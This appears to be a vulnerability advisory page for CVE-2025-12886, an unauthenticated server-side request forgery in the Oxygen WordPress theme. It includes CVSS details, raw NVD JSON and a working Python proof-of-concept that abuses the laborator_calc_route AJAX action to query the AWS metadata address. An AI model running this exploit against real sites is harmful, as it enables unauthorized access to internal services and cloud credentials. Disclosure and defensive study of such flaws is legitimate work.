Security Vulnerability Report
中文
CVE-2025-12886 CVSS 7.2 HIGH

CVE-2025-12886

Published: 2026-03-28 04:16:49
Last Modified: 2026-04-24 16:36:24
Source: [email protected]

Description

The Oxygen Theme theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.0.8 via the laborator_calc_route AJAX action. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Oxygen Theme <= 6.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_ssrf(target_url, internal_url): """ PoC for CVE-2025-12886 Exploits unauthenticated SSRF in Oxygen Theme <= 6.0.8 """ # The vulnerable AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload data targeting the vulnerable action data = { "action": "laborator_calc_route", "route": internal_url # The parameter that triggers the request } try: print(f"[*] Sending request to {ajax_url}...") response = requests.post(ajax_url, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully!") print(f"[+] Response content:") print(response.text) else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with target # Example internal target (AWS Metadata) internal_target = "http://169.254.169.254/latest/meta-data/" exploit_ssrf(target, internal_target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12886", "sourceIdentifier": "[email protected]", "published": "2026-03-28T04:16:49.323", "lastModified": "2026-04-24T16:36:24.067", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Oxygen Theme theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.0.8 via the laborator_calc_route AJAX action. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}, {"lang": "es", "value": "El tema Oxygen Theme para WordPress es vulnerable a falsificación de petición del lado del servidor en todas las versiones hasta la 6.0.8, inclusive, a través de la acción AJAX laborator_calc_route. Esto permite que atacantes no autenticados realicen peticiones web a ubicaciones arbitrarias originadas desde la aplicación web y puede utilizarse para consultar y modificar información de servicios internos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://documentation.laborator.co/kb/oxygen/oxygen-release-notes/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8c83f430-8a4d-40fa-890c-387c787a3b55?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.